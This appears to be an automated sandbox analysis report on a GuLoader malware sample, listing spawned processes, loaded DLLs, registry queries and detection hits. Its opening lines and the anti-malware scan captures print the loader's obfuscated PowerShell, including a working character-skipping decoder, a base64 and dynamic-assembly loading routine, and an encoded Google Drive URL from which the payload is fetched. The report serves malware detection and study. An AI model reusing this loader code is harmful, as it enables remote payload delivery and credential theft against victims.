';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker BJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klapjagters.Sep && echo $"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: cryptdlg.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msoert2.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: cryptui.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msftedit.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: explorerframe.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: actxprxy.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: cryptdlg.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msoert2.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: cryptui.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msftedit.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: explorerframe.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: C:\Users\user\AppData\Roaming\newfile\newfile.exeFile opened: C:\Windows\SysWOW64\msftedit.dllJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb= source: powershell.exe, 00000004.00000002.1991407968.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1999089456.0000000007459000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000004.00000002.1991407968.0000000002D38000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2004519989.0000000008470000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1991407968.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: indows\System.Core.pdbF source: powershell.exe, 00000004.00000002.1991407968.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: .pdb#j source: powershell.exe, 00000004.00000002.1991407968.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wab.pdb source: newfile.exe

            Data Obfuscation

            barindex
            VBScript performs obfuscated calls to suspicious functions
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=", "0")
            Yara detected GuLoader
            Source: Yara matchFile source: 00000004.00000002.2006759213.000000000B869000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2261833973.00000221E3C09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2006054606.0000000008700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1995366811.0000000005BC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Magera116)$global:reboundingness = [System.Text.Encoding]::ASCII.GetString($Preconjecturing)$global:jamboretten=$reboundingness.substring(347067,28673)<#Reprehensive Tunnelman Geoduc
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Egnsteaters $Polyplectron $Nongratifying), (Statsministrenes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Kimms = [AppDomain]::CurrentDomain.GetAssembli
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Raggety)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Nedbrsmngde, $false).DefineType($Byportens, $Ganz
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Magera116)$global:reboundingness = [System.Text.Encoding]::ASCII.GetString($Preconjecturing)$global:jamboretten=$reboundingness.substring(347067,28673)<#Reprehensive Tunnelman Geoduc
            Suspicious powershell command line found
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 